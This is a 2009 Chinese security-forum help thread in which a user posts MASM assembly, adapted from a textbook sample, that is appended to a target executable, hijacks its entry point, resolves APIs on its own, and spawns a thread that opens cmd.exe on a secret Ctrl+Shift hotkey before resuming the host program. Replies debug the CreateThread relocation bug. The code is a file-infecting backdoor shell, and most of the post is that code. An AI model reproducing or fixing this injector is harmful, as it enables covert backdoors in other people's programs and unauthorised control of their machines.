[求助]把代码插入文件以后创建线程总是出现错误。求高手帮助,附代码-经典问答-看雪-安全社区|安全招聘|kanxue.com

[求助]把代码插入文件以后创建线程总是出现错误。求高手帮助,附代码

发表于: 2009-1-11 00:56 3054

[求助]把代码插入文件以后创建线程总是出现错误。求高手帮助,附代码

mmhkh

2009-1-11 00:56

3054

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Sample code for < Win32ASM Programming 2nd Edition>
; by 罗云彬, http://asm.yeah.net
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 要被添加到目标文件后面的执行代码
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 一些函数的原形定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProtoGetProcAddress typedef proto :dword,:dword
_ProtoLoadLibrary typedef proto :dword
_ProtoMessageBox typedef proto :dword,:dword,:dword,:dword
_ProtoDialogBoxParam typedef proto :dword,:dword,:dword,:dword,:dword
_ProtoExitThread typedef proto :dword
_ProtoGetDlgItemText typedef proto :dword,:dword,:dword,:dword
_Protolstrcmp typedef proto :dword,:dword
_ProtoRegisterHotKey typedef proto :dword,:dword,:dword,:dword
_ProtoGetMessage typedef proto :dword,:dword,:dword,:dword
_ProtoCreateThread typedef proto :dword,:dword,:dword,:dword,:dword,:dword
_ProtoWinExec typedef proto :dword,:dword
;_HookHotKey typedef proto

_ApiGetProcAddress typedef ptr _ProtoGetProcAddress
_ApiLoadLibrary typedef ptr _ProtoLoadLibrary
_ApiMessageBox typedef ptr _ProtoMessageBox
_ApiDialogBoxParam typedef ptr _ProtoDialogBoxParam
_ApiExitThread typedef ptr _ProtoExitThread
_ApiGetDlgItemText typedef ptr _ProtoGetDlgItemText
_Apilstrcmp typedef ptr _Protolstrcmp
_ApiRegisterHotKey typedef ptr _ProtoRegisterHotKey
_ApiGetMessage typedef ptr _ProtoGetMessage
_ApiCreateThread typedef ptr _ProtoCreateThread
_ApiWinExec typedef ptr _ProtoWinExec
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
;
APPEND_CODE equ this byte
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 被添加到目标文件中的代码从这里开始
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include _GetKernel.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
hDllKernel32 dd ?
hDllUser32 dd ?

_GetProcAddress _ApiGetProcAddress ?
_LoadLibrary _ApiLoadLibrary ?
_MessageBox _ApiMessageBox ?
_DialogBoxParam _ApiDialogBoxParam ?
_ExitThread _ApiExitThread ?
_GetDlgItemText _ApiGetDlgItemText ?
_lstrcmp _Apilstrcmp ?
_RegisterHotKey _ApiRegisterHotKey ?
_GetMessage _ApiGetMessage ?
_CreateThread _ApiCreateThread ?
_WinExec _ApiWinExec ?

szLoadLibrary db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
szUser32 db 'user32',0
szMessageBox db 'MessageBoxA',0
szDialogBoxParam db 'DialogBoxParamA',0
szExitThread db 'ExitThread',0
szGetDlgItemText db 'GetDlgItemTextA',0
szlstrcmp db 'lstrcmpA',0
szRegisterHotKey db 'RegisterHotKey',0
szGetMessage db 'GetMessageA',0
szCreateThread db 'CreateThread',0
szWinExec db 'WinExec',0
szCaption db '问题提示',0
szCmd db 'cmd.exe',0
szHwnd db 'GetShell',0
szMyPassWord db 'simskyc',0
szWrongPassWord db '密码错误',0
szRightPassWord db '密码正确'
mHotKeyMsg MSG <>
swThreadID dd ?
;********************************************************************
; 新的函数入口地址
;********************************************************************
_HookHotKey proc uses eax ebx esi
invoke [ebx+_RegisterHotKey],NULL,1h,MOD_CONTROL + MOD_SHIFT,58h
.if eax==0
invoke [ebx+_ExitThread],NULL
.endif

.while TRUE
lea ecx,[ebx+mHotKeyMsg]
invoke [ebx+_GetMessage],ecx,NULL,0,0
.break .if eax==0
mov eax,[ebx+mHotKeyMsg.message]
.if eax==WM_HOTKEY
mov eax,[ebx+mHotKeyMsg.wParam]
.if eax==1h
lea ecx,[ebx+szCmd]
invoke [ebx+_WinExec],ecx,SW_SHOWNORMAL
invoke [ebx+_ExitThread],NULL
;invoke GetModuleHandle,NULL
;mov hInstance,eax
;invoke DialogBoxParam,NULL,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
;ret
.endif
.endif
.endw
_HookHotKey endp
;********************************************************************
; 新的入口地址
;********************************************************************
_NewEntry:
;********************************************************************
; 重定位并获取一些 API 的入口地址
;********************************************************************
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
invoke _GetKernelBase,[esp] ;获取Kernel32.dll基址
.if ! eax
jmp _ToOldEntry
.endif
mov [ebx+hDllKernel32],eax ;获取GetProcAddress入口
lea eax,[ebx+szGetProcAddress]
invoke _GetApi,[ebx+hDllKernel32],eax
.if ! eax
jmp _ToOldEntry
.endif
mov [ebx+_GetProcAddress],eax
;********************************************************************
lea eax,[ebx+szLoadLibrary] ;获取LoadLibrary入口
invoke [ebx+_GetProcAddress],[ebx+hDllKernel32],eax
mov [ebx+_LoadLibrary],eax

lea eax,[ebx+szUser32] ;获取User32.dll基址
invoke [ebx+_LoadLibrary],eax
mov [ebx+hDllUser32],eax

lea eax,[ebx+szMessageBox] ;获取MessageBox入口
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_MessageBox],eax

lea eax,[ebx+szWinExec] ;获取WinExec入口
invoke [ebx+_GetProcAddress],[ebx+hDllKernel32],eax
mov [ebx+_WinExec],eax

lea eax,[ebx+szCreateThread] ;获取CreateThread入口
invoke [ebx+_GetProcAddress],[ebx+hDllKernel32],eax
mov [ebx+_CreateThread],eax

lea eax,[ebx+szGetMessage] ;获取GetMessage入口
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_GetMessage],eax

lea eax,[ebx+szRegisterHotKey] ;获取RegisterHotKey入口
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_RegisterHotKey],eax

lea eax,[ebx+szlstrcmp] ;获取lstrcmp入口
invoke [ebx+_GetProcAddress],[ebx+hDllKernel32],eax
mov [ebx+_lstrcmp],eax

lea eax,[ebx+szGetDlgItemText] ;获取GetDlgItemText入口
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_GetDlgItemText],eax

lea eax,[ebx+szExitThread] ;获取ExitThread入口
invoke [ebx+_GetProcAddress],[ebx+hDllKernel32],eax
mov [ebx+_ExitThread],eax

lea eax,[ebx+szDialogBoxParam] ;获取DialogBoxParam入口
invoke [ebx+_GetProcAddress],[ebx+hDllUser32],eax
mov [ebx+_DialogBoxParam],eax

;********************************************************************
; 插入的操作
;********************************************************************
lea ecx,[ebx+swThreadID]
;lea eax,[ebx+_API]
;invoke [ebx+_MessageBox],NULL,ecx,NULL,MB_YESNO or MB_ICONQUESTION
invoke [ebx+_CreateThread],NULL,0,addr _HookHotKey,NULL,NULL,ecx
;lea ecx,[ebx+_ExitThread]

;ret
;invoke [ebx+_WinExec],ecx,SW_SHOWNORMAL

;********************************************************************
; 执行原来的文件
;********************************************************************
_ToOldEntry:
db 0e9h ;0e9h是jmp xxxxxxxx的机器码
_dwOldEntry:
dd ? ;用来填入原来的入口地址
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

APPEND_CODE_END equ this byte

请高手帮忙看看用其他的函数都没有唯独用createthread 就会出现错误

[课程]FART 脱壳王！加量不加价！FART作者讲授！

收藏・0

免费・0

支持

最新回复 (4)
mmhkh 雪币： 71 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 26 回帖 124 粉丝 0 关注私信	mmhkh 2 楼用OD载入测试下发现执行到 createthread 以后任务管理器里进程的确创建了一条线程但这个线程总是出错即使用调用的线程函数里就一句messagebox也不行求高手求解 2009-1-11 00:59 0
shangde 雪币： 212 活跃值： (1232) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 27 粉丝 0 关注私信	shangde 3 楼 Deleaker for Visual C++ 是一个强势的内存错误和Leak工具对ASM VC++非常好,建议使用,只不过没有注册版本 2009-1-11 01:48 0
书呆彭雪币： 2110 活跃值： (21) 能力值： (RANK：260 ) 在线值：发帖 30 回帖 1861 粉丝 2 关注私信	书呆彭 6 4 楼 invoke [ebx+_CreateThread],NULL,0,[COLOR="Red"]addr _HookHotKey[/COLOR],NULL,NULL,ecx 这个参数是不是也重定位一下，比如用个寄存器啥的？用OD断在CreateThread的入口处后，观察一下堆栈中的这个参数是不是正确。另外，对楼上的shangde提出警告，行为恶劣，小心被BAN！这是他发的所有帖子：http://bbs.pediy.com/search.php?searchid=1262206 2009-1-12 04:33 0
CrackMe龙龙雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 34 回帖 265 粉丝 0 关注私信	CrackMe龙龙 5 楼 [QUOTE=书呆彭;563751]invoke [ebx+_CreateThread],NULL,0,addr _HookHotKey,NULL,NULL,ecx 这个参数是不是也重定位一下，比如用个寄存器啥的？用OD断在CreateThread的入口处后，观察一下堆栈中的这个参数是不是正确。另外，对楼上的shangd...[/QUOTE] 版主能否推荐本学习汇编的书。王爽的和WIN32的我都看过。还有一些其他的可是还觉得不够用。主要是看OD反汇编出的程序代码找不出注册码和算法 2009-1-12 09:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

mmhkh

发帖

124

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (4)
mmhkh 雪币： 71 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 26 回帖 124 粉丝 0 关注私信	mmhkh 2 楼用OD载入测试下发现执行到 createthread 以后任务管理器里进程的确创建了一条线程但这个线程总是出错即使用调用的线程函数里就一句messagebox也不行求高手求解 2009-1-11 00:59 0
shangde 雪币： 212 活跃值： (1232) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 27 粉丝 0 关注私信	shangde 3 楼 Deleaker for Visual C++ 是一个强势的内存错误和Leak工具对ASM VC++非常好,建议使用,只不过没有注册版本 2009-1-11 01:48 0
书呆彭雪币： 2110 活跃值： (21) 能力值： (RANK：260 ) 在线值：发帖 30 回帖 1861 粉丝 2 关注私信	书呆彭 6 4 楼 invoke [ebx+_CreateThread],NULL,0,[COLOR="Red"]addr _HookHotKey[/COLOR],NULL,NULL,ecx 这个参数是不是也重定位一下，比如用个寄存器啥的？用OD断在CreateThread的入口处后，观察一下堆栈中的这个参数是不是正确。另外，对楼上的shangde提出警告，行为恶劣，小心被BAN！这是他发的所有帖子：http://bbs.pediy.com/search.php?searchid=1262206 2009-1-12 04:33 0
CrackMe龙龙雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 34 回帖 265 粉丝 0 关注私信	CrackMe龙龙 5 楼 [QUOTE=书呆彭;563751]invoke [ebx+_CreateThread],NULL,0,addr _HookHotKey,NULL,NULL,ecx 这个参数是不是也重定位一下，比如用个寄存器啥的？用OD断在CreateThread的入口处后，观察一下堆栈中的这个参数是不是正确。另外，对楼上的shangd...[/QUOTE] 版主能否推荐本学习汇编的书。王爽的和WIN32的我都看过。还有一些其他的可是还觉得不够用。主要是看OD反汇编出的程序代码找不出注册码和算法 2009-1-12 09:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[求助]把代码插入文件以后 创建线程总是出现错误。求高手帮助,附代码

[求助]把代码插入文件以后创建线程总是出现错误。求高手帮助,附代码